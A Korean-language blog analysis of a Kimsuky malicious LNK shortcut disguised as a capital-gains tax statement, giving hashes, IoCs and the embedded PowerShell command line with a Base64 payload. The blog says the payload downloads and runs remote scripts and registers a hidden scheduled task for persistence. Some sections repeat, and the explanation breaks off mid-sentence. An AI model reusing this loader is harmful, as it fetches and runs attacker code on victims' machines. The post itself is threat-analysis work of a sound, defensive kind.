북한 김수키(Kimsuky)양도소득 과세표준 신고 및 납부계산서 로 위장한 악성코드-out.lnk(2024.11.26)
Contents
오늘은 북한 APT인 북한 김수키(Kimsuky)양도소득 과세표준 신고 및 납부계산서로 위장한 악성코드인 out.lnk(2024.11.26)에 대해 알아보겠습니다. 소득세의 일종이며 양도소득세(讓渡所得稅)는 자산양도로 말미암아 벌어들인 자본이익에 대해 부과하는 세금을 가리키는 말이며 줄여서 양도세라 부르기도 하고 있습니다. 일단 해당 악성코드는 언제나 변하지 않는 lnk 방식으로 악성코드를 유포하는 것은 똑같습니다.
해쉬값
파일명:(김X경님) 양도소득 과세표준 신고 및 납부계산서.pdf.lnk
사이즈:6,070 Bytes
MD5:adcd2bcd43a6f495facfe31e71d4e2b8
SHA-1:4bdbf8733e178d50f1763d5999b58bb889138f43
SHA-256:f5740e4027ad48231f199b18b8ae15a1343b282693ca98ae4b913fdd46472171
입니다.
악성코드 내부에 포함된 파워셀(PowerShell) 코드
StringData
{
namestring: Type: Hangul Document
Size: 2.84 KB
Date modified: 10/20/2023 11:23
relativepath: ..\..\..\WINDOWS\system32\WindowsPowerShell\v1.0\powershell(.)exe
workingdir: not present
commandlinearguments:
"$ss =\"JGhoaCA9IEpvaW(4)tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkg
IijquYDsnqzqsr3ri5gpIOyWkeuPhOyGjOuTnSDqs7z(s)hLjtkZzspIAg7Iug6rOgIOuwjyDrgqnrto
Dqs4TsgrDshJwucGRmIjsgd2dldCAtVXJpICJodHRwczovL2RsLmRyb3B(i)b3h1c2VyY29udGVudC5jb
20vc2NsL2ZpLzRxbXA3cDhma21md2ZzbHR0NmltYi8wNjA3b25saW5lLnBkZj9ybGtleT1wZWMy(Z)TBk
Dl0bTR3and6ZXJoNDNvOXp4JnN0PWZ3eGh6djkyJmRsPTAiIC1PdXRGaWxlICRoaGg7ICYgJGhoaDsgJHB
wcCA9IEpva(W)4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEp
vaW4tUGF0aCAoJGVudjpBcHBEYX(R)hKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJ
vcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZzVnZDd(j)bDlnMDdzbG50cTkxcXlzLzA2MDdvbmxpbmU
teC50eHQ/cmxrZXk9NXo5M3A0c2EwdHZtMHVlcWc4ODRpcDlneSZzdD1meGlp(a)mtsbCZkbD0wIiAtT3V
0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgf(C)B
PdXQtRmlsZSAtRmlsZVBhdGggJHBwcCAtRW5jb2RpbmcgVVRGODsgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZ
WRUYXNrQWN0aW(9)uIC1FeGVjdXRlICdQb3dlclNoZWxsLmV4ZScgLUFyZ3VtZW50ICctV2luZG93U3R5b
GUgSGlkZGVuIC1ub3AgIC1Ob25JbnR(l)cmFjdGl2ZSAtTm9Qcm9maWxlIC1FeGVjdXRpb25Qb2xpY3kgQ
nlwYXNzIC1Db21tY(W)5kICImIHskYWJjID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpIFwiY2hyb21lL
nBzMVwiOyAmICRhYmM7fSInOyAkdHJpZ2(d)lciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtT25jZ
SAtQXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZXBldG(l)aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3
BhbiAtTWludXRlcyAzMCk7ICRzZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2(V)0dG(l)uZ3NTZXQg
LUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIkNocm9tZVVwZGF0ZVRhc2tNYW
NoaW5(l)S09SIiAtQWN0aW9uICRhY3Rpb24gLVRyaWdnZXIgJHRyaWdnZXIgLVNldHRpbmdzICRzZXR0aW
5nczsgICRhYWEgPSBKb2lu(L)VBhdGggKCRlbnY6QXBwRGF0YSkgInN5c3RlbV9maXJzdC5wczEiOyB3Z2
V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZ(X)Jjb250ZW50LmNvbS9zY2wvZmkvZDRzOHJvYnRxZD
VldmowbXI5aGdhLzA2MDdvbmxpbmUtZi50eHQ/cmxrZXk9cHdtcGJ0MW(k)4MmM1d2czZmY4YjB1YmRrdS
ZzdD1qNzlsNmZ3OSZkbD0wIiAtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1(Q)YXRoIC
RhYWEgLUZvcmNlOw==\"; $aa = [System.Text.Encoding]
::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc
= $env:appdata;$dd = \"user(.)ps1\";$ee = Join-Path $cc $dd;$aa
| Out-File -FilePath $ee; $aaaaa= 89897878; & $ee; Remove-Item -Path $ee -Force;"
iconlocation: %ProgramFiles(x86)%\\Microsoft\\Edge\\Application\\msedge(.)exe
}
악성코드 설명
1.파일 형식:
한글 문서(Hangul Document)로 위장되었으며 크기가 2.84 KB
PowerShell 실행:
relativepath가 PowerShell 실행 파일을 지정하고 있으며 해당 문서가 단순한 텍스트 파일이 아니라 PowerShell 명령을 통해 코드를 실행할 수 있는 스크립트를 포함한다는 것을 의미
아이콘 위장:iconlocation은 Microsoft Edge 브라우저의 아이콘 경로를 지정 정상적인 문서처럼 보이도록 설계
2. Base64로 인코딩
$ss 변수에 포함된 Base64 인코딩된 문자열은 악성 스크립트를 감추기 위한 행동
디코딩
목표는 파일 다운로드 및 실행, 작업 스케줄러 등록을 통해 악성코드의 …
해쉬값
파일명:(김X경님) 양도소득 과세표준 신고 및 납부계산서.pdf.lnk
사이즈:6,070 Bytes
MD5:adcd2bcd43a6f495facfe31e71d4e2b8
SHA-1:4bdbf8733e178d50f1763d5999b58bb889138f43
SHA-256:f5740e4027ad48231f199b18b8ae15a1343b282693ca98ae4b913fdd46472171
입니다.
악성코드 내부에 포함된 파워셀(PowerShell) 코드
StringData
{
namestring: Type: Hangul Document
Size: 2.84 KB
Date modified: 10/20/2023 11:23
relativepath: ..\..\..\WINDOWS\system32\WindowsPowerShell\v1.0\powershell(.)exe
workingdir: not present
commandlinearguments:
"$ss =\"JGhoaCA9IEpvaW(4)tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkg
IijquYDsnqzqsr3ri5gpIOyWkeuPhOyGjOuTnSDqs7z(s)hLjtkZzspIAg7Iug6rOgIOuwjyDrgqnrto
Dqs4TsgrDshJwucGRmIjsgd2dldCAtVXJpICJodHRwczovL2RsLmRyb3B(i)b3h1c2VyY29udGVudC5jb
20vc2NsL2ZpLzRxbXA3cDhma21md2ZzbHR0NmltYi8wNjA3b25saW5lLnBkZj9ybGtleT1wZWMy(Z)TBk
Dl0bTR3and6ZXJoNDNvOXp4JnN0PWZ3eGh6djkyJmRsPTAiIC1PdXRGaWxlICRoaGg7ICYgJGhoaDsgJHB
wcCA9IEpva(W)4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEp
vaW4tUGF0aCAoJGVudjpBcHBEYX(R)hKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJ
vcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZzVnZDd(j)bDlnMDdzbG50cTkxcXlzLzA2MDdvbmxpbmU
teC50eHQ/cmxrZXk9NXo5M3A0c2EwdHZtMHVlcWc4ODRpcDlneSZzdD1meGlp(a)mtsbCZkbD0wIiAtT3V
0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgf(C)B
PdXQtRmlsZSAtRmlsZVBhdGggJHBwcCAtRW5jb2RpbmcgVVRGODsgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZ
WRUYXNrQWN0aW(9)uIC1FeGVjdXRlICdQb3dlclNoZWxsLmV4ZScgLUFyZ3VtZW50ICctV2luZG93U3R5b
GUgSGlkZGVuIC1ub3AgIC1Ob25JbnR(l)cmFjdGl2ZSAtTm9Qcm9maWxlIC1FeGVjdXRpb25Qb2xpY3kgQ
nlwYXNzIC1Db21tY(W)5kICImIHskYWJjID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpIFwiY2hyb21lL
nBzMVwiOyAmICRhYmM7fSInOyAkdHJpZ2(d)lciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtT25jZ
SAtQXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZXBldG(l)aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3
BhbiAtTWludXRlcyAzMCk7ICRzZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2(V)0dG(l)uZ3NTZXQg
LUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIkNocm9tZVVwZGF0ZVRhc2tNYW
NoaW5(l)S09SIiAtQWN0aW9uICRhY3Rpb24gLVRyaWdnZXIgJHRyaWdnZXIgLVNldHRpbmdzICRzZXR0aW
5nczsgICRhYWEgPSBKb2lu(L)VBhdGggKCRlbnY6QXBwRGF0YSkgInN5c3RlbV9maXJzdC5wczEiOyB3Z2
V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZ(X)Jjb250ZW50LmNvbS9zY2wvZmkvZDRzOHJvYnRxZD
VldmowbXI5aGdhLzA2MDdvbmxpbmUtZi50eHQ/cmxrZXk9cHdtcGJ0MW(k)4MmM1d2czZmY4YjB1YmRrdS
ZzdD1qNzlsNmZ3OSZkbD0wIiAtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1(Q)YXRoIC
RhYWEgLUZvcmNlOw==\"; $aa = [System.Text.Encoding]
::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc
= $env:appdata;$dd = \"user(.)ps1\";$ee = Join-Path $cc $dd;$aa
| Out-File -FilePath $ee; $aaaaa= 89897878; & $ee; Remove-Item -Path $ee -Force;"
iconlocation: %ProgramFiles(x86)%\\Microsoft\\Edge\\Application\\msedge(.)exe
}
악성코드 설명
1.파일 형식:
한글 문서(Hangul Document)로 위장되었으며 크기가 2.84 KB
PowerShell 실행:
relativepath가 PowerShell 실행 파일을 지정하고 있으며 해당 문서가 단순한 텍스트 파일이 아니라 PowerShell 명령을 통해 코드를 실행할 수 있는 스크립트를 포함한다는 것을 의미
아이콘 위장:iconlocation은 Microsoft Edge 브라우저의 아이콘 경로를 지정 정상적인 문서처럼 보이도록 설계
2. Base64로 인코딩
$ss 변수에 포함된 Base64 인코딩된 문자열은 악성 스크립트를 감추기 위한 행동
디코딩
목표는 파일 다운로드 및 실행, 작업 스케줄러 등록을 통해 악성코드의 …
IoC
4bdbf8733e178d50f1763d5999b58bb889138f43
adcd2bcd43a6f495facfe31e71d4e2b8
f5740e4027ad48231f199b18b8ae15a1343b282693ca98ae4b913fdd46472171
adcd2bcd43a6f495facfe31e71d4e2b8
f5740e4027ad48231f199b18b8ae15a1343b282693ca98ae4b913fdd46472171